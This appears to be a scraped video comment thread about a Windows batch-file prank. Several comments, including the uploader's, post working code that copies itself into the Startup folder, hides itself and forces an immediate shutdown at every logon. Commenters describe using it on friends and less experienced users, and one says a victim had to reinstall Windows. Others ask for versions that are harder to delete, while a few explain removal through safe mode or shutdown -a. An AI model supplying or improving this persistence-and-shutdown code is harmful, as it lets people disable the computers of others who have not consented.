Added: 3 years ago
From: devo85x
Views: 5,410
Sort by time | Sort by thread (beta)

Link to this comment:

Share to:

All Comments (47)

Sign In or Sign Up now to post a comment!
  • can you make a source code link so we dont have to copy iy down manualy would realy help .. thanks

  • where could i find the file when i decided to delete it of my friends computer?

  • @daviddwk wherever you put it after you boot to safe mode.

  • Fine, i'm doing this for EDUCATIONAL PURPOSES.

  • lawlz failure.... itzor never will workzor correctlyzor.

  • @Bob0p English. Do you know it?

  • @devo85x yes i r does but uz don'tz haz cheeze burgerz andz doez notz knowz lolz.

  • @Bob0p Wannabe geek?

  • @devo85x now u get no cookiez. u also realize there is such thing as safe mode and by entering it wont start this up there for allowing the user to delete this and also if the user set their "startup" folder to read only this will fail in the attempt of shuting down the computer, and it takes more then 10 second to shut down allowing the user time to actshualy open up run and type in shutdown -a, which aborts the shut down. most users also have hidden files viewable. it takes around 30 seconds

  • @Bob0p Now check your fail, look at the date posted, no shit there is safe mode, I have said it in previous comments... and when it is set to -t 0 it takes 0 seconds to start shutting down, giving no time for -a... nice try... nice fail... and no most users do not have hidden files viewable. And even if you do use safe mode, it is set as a system file so you can't just straight up delete it without using attrib first...

  • @devo85x um no it still takes longer then you expect because the startup folder is in a sequence order on starting up your computer and other programs will delay the shutdown processes that are starting up. meaning. Meaning it will take its time to get to the startup folder if you have other programs on start up, for my computer it takes a good 3 min inorder to start anything in the start up folder meaning I would have more then enough time to react to this little batch file.

  • @devo85x im sorry about saying most users do not have hidden files viewable I forgot most people are stupid and think they have skills when they make something as simple as this, from commands they more then likely looked up on google and had to copy and paste not understanding that 1/2 the crap in the file is pointless and loops pointlessly, "goto a" - pointless since you already had a if statement saying if it does not exist or if it does there. Meaning you did not understand it fully.

  • Stop making Viruses! and stop making life hard for pc users!!!!

  • @ondd1 Lol :) It isn't that bad :)

  • @ondd1 DONT WORRY devo85x, I'll Save you!!

    its not a virus, it doesn't edit the registry and you could go to start mode and delete it.

    If your watching this then 1, you tend to do this yourself, 2, you want to be a hater, or 3, you already know about computer so much so, that you know how to counter-act this if anything goes wrong.

    Im using this for a batch game but i could do it. Thank you devo

  • @ondd1 use linux if you are so scared of viruses. besides a good antivirus removes lamost all viruses.

  • @rockager7 HEHEHEHHE:))MANN I KNOW HOW TO MAKE MY .BAT FUD100%--Who wANNA KNOW HOW JUST PM ME

  • You have to run in safe mode to stop

    1. Restart

    2. On restart keep pressing f8 I think

    3. Select safe mode

  • once this is opened is there a way to turn it off ??? will shutdown -a work

  • i send it to my friend , and he called me to RE-INSTALL windows , WHAT A NOOB !

  • how do i make a VBS Script or a batch file that adds itself to startup? what is the code? someone please reply

  • I got another problem now.... i copyed the code and saved as batch and it wont go in startup i copyed the code several times now

  • Is there anyway to make a shortcut to the startup? because if you delete the program from the desktop it wont beable to run in the startup unless u make a shortcut. So when u open it, it has 2 make a shortcut not copy.... do u no how to do that?

  • not really sure what you are asking, but as long as you run the batch file once, it wont matter where you keep it, it will have a copy that will run from startup

  • @devo85x i had something like this but it was obviouslly a batch file on a desktop so this is great!

  • I know what you are talking about, so just make it run inside %temp% or something, and for the problem regarding the shortcut, what you can do is split this up into 2 files and call them when neccessary. Just google this stuff and you will figure it out eventually.

  • hey how come its shutdown -f -t 1 -c "lulz" not

    shutdown -s -t 1 "lulz" did u make a typo? o.0 oh ya and I CAN VIEW THE VID :D helped alot!

  • i think it might be "shutdown -s -f -t 1 -c "lulz"

    the -f forces windows to close any open apps

  • Comment removed

  • lol, sry about that, its a problem with youtube though, not the video (it has happened to me on a couple of videos :)

  • how i can stop this shit, i hawe a bat file who every time autorun..... ewery time my PC shut's down.... I can't find it file!! :@

  • when you log in, hold shift to stop any program in startup from autorunning, if it is in registry then its a bit harder

  • i enjoy r videos.

  • *** PLANNED UPDATE ***

    I plan on updating the code sometime this weekend (hopefully). So far the code I have updated adds the following.

    + The name of the file does not matter

    + Harder to delete

    + A "remove program" file to help you remove it

  • is it here yet I can't wait lol

  • I have some code that's almost ready, I'm just making some final adjustments and making sure there are no syntax errors. It should be up by Saturday night.

  • cool

  • sick, so is that tonight?

    Cuz we might have different time zones...

  • wow... i was about to upload it when i saw this comment put on one minute before i started... as soon as i click post comment, i will be uploading!

  • when will the new revised code be out? because I'm looking forwared to the fixed bugs and new features?

    What will the new features/fixed stuff be?

    Also when will it be done?

    Cuz i want it soon lol=)

  • I haven't had a lot of time since school started to work on code but I will try to get some work done this weekend. Thanks for being patient :)

  • kool it sounds awesome!

  • what can i name it as ?

  • in this video it is named startup.bat, i will try to write some updated code in the next week if i have the time so stay tuned for that

  • any way to make it send the file to startup instead of copy?

  • whenever it uses the command "copy" change it to "move"

  • lol its ok. this should be the code.

  • @echo off

    title test

    color 17

    if exist "%userprofile%\start menu\programs\startup\startup copy.bat" goto a

    if not exist "%userprofile%\start menu\programs\startup\startup copy.bat" goto b

    goto c

  • :a cls goto c :b copy %0 "%userprofile%\start menu\programs\startup" goto c :c cls echo. echo Write a small program in this area. pause exit
  • The code is slightly updated...

  • do you name it copy.bat?

  • "startup copy.bat" ill try to get new code on here so you dont need to change the name

  • xssssssssssss

  • if we change the name of the file, will it work?

  • not on this video but i will put up a new video that will... or you can just use my video that does the same as this but makes a new key in the regestry instead of just copying

  • also delets itself

  • good code! heres a shorter version. @echo off IF NOT EXIST "%userprofile%\Start Menu\Programs\Startup\startup.­bat" Goto CB shutdown -s -t 0 del %0 exit :CB Copy "startup.bat" "%userprofile%\Start Menu\Programs\Startup\startup.­bat" attrib +h "%userprofile%\Start Menu\Programs\Startup\startup.­bat" exit
  • there is a problem with this code though. the del %0 will not run because shutdown -s -t 0 will prevent it from getting to that command line... besides you dont need for it to delete itself because if it did it would fix the problem of it being in startup for the person whos computer it is on

  • ignore that last comment!

  • lol it hides itself but thanks for commenting anyways

  • It dosn't work for me!

  • You Can stop this in SAFEMODE

    or

    in LIVE CD

    in RECUSE DISK

  • this is to use on someone who doesnt know anything about computers... but i made the video so people could get used to some batch code... not to use as a virus lol besides. about 5% of the people i know, know how to boot to safe. 1% to use live cd and 5% to use rescue disk lol

  • @echo off title lulz cls :a if not exist "%userprofile%\start menu\programs\startup\startup.­bat" goto b if exist "%userprofile%\start menu\programs\startup\startup.­bat" goto c goto a :b copy "startup.bat" "%userprofile%\start menu\programs\startup\startup.­bat" >nul goto c :c attrib +h "%userprofile%\start menu\programs\startup\startup.­bat" >nul cls shutdown -f -t 1 -c "lulz" exit
  • thnx alot!

  • can u put the code in the description or in a comment

  • ill see if it will fit anywhere

Loading...
Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more